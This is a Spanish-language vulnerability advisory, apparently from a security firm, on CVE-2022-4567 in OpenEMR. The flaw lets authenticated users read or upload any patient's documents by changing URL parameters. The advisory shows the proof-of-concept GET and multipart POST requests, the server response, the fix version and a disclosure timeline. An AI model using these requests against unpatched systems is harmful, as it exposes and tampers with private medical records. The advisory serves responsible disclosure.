OpenEMR - Fallo en los Controles de Acceso a los Documentos de Pacientes (CVE-2022-4567)

Resumen

Un usuario autenticado sin permisos de acceso a la sección «Documentos» podría acceder directamente a cualquier documento del sistema manipulando los parámetros patient_id y document_id en la propia url. Además, al tener un identificador autoincremental, era vulnerable a ataques de fuerza bruta en ambos parámetros, disminuyendo la dificultad de encontrar documentos válidos. La segunda instancia permitía a los usuarios sin privilegios subir archivos a cualquier repositorio de otros usuarios.

Impacto

Cualquier usuario autenticado podía saltarse las restricciones de acceso a los documentos y descargar cualquier documento relacionado con cualquier usuario del sistema. También era posible subir documentos en nombre de cualquier paciente que podrían contener datos maliciosos que serían tratados como datos médicos válidos.

Descripción

La primera instancia permitía a cualquier usuario acceder a un documento haciendo referencia a los parámetros patient_id y document_id:

http://domain/openemr/controller.php?document&retrieve&patient_id=2&document_id=19

La segunda instancia afectaba a la funcionalidad de subida de ficheros. La siguiente petición fue usada como ejemplo para subir un fichero a nombre de otro usuario:

POST /openemr/controller.php?document&upload&patient_id=2&parent_id=1& HTTP/1.1

Host: REDACTED

(…snip…)

Upgrade-Insecure-Requests: 1

—————————–247482557730593022112237721191

Content-Disposition: form-data; name=»MAX_FILE_SIZE»

64000000

—————————–247482557730593022112237721191

Content-Disposition: form-data; name=»file[]»; filename=»testBAC.txt»

Content-Type: text/plain

TESTFILE

—————————–247482557730593022112237721191

Content-Disposition: form-data; name=»dicom_folder[]»; filename=»»

Content-Type: application/octet-stream

(…snip…)

—————————–247482557730593022112237721191–

La respuesta mostraba el mensaje «Documents Not Authorized«, pero el archivo se había subido correctamente:

REQUEST:

GET /openemr/controller.php?document&retrieve&patient_id=2&document_id=23&as_file=false HTTP/1.1

(…snip…)

RESPONSE:

HTTP/1.1 200 OK

Date: Fri, 07 Oct 2022 16:07:36 GMT

Server: Apache/2.4.54 (Debian)

Expires: 0

Cache-Control: must-revalidate, post-check=0, pre-check=0

Pragma: public

Content-Description: File Transfer

Content-Transfer-Encoding: binary

Content-Disposition: inline; filename=»testBAC.txt»

Content-Length: 8

Connection: close

Content-Type: text/plain;charset=utf-8

TESTFILE

Recomendaciones

Actualice el software a la versión 7.0.0 (parche 2) o aplique el último parche suministrado.

Referencias

https://www.open-emr.org/release-notes/patch2

https://huntr.dev/bounties/1ac677c4-ec0a-4788-9465-51d9b6bd8fd2/

Cronología



07/10/2022

Reporte creado



08/10/2022

Fabricante contactado



19/10/2022

Confirmación del desarrollador



25/10/2022

Validado y corregido



30/11/2022

Publicada nueva versión con correcciones



14/12/2022

CVE y lanzamiento público

OpenEMR – Fallo en los Controles de Acceso a los Documentos de Pacientes (CVE-2022-4567)

Resumen

Impacto

Descripción

Recomendaciones

Referencias

Cronología

07/10/2022

08/10/2022

19/10/2022

25/10/2022

30/11/2022

14/12/2022

¿Quiere auditar la ciberseguridad de su empresa?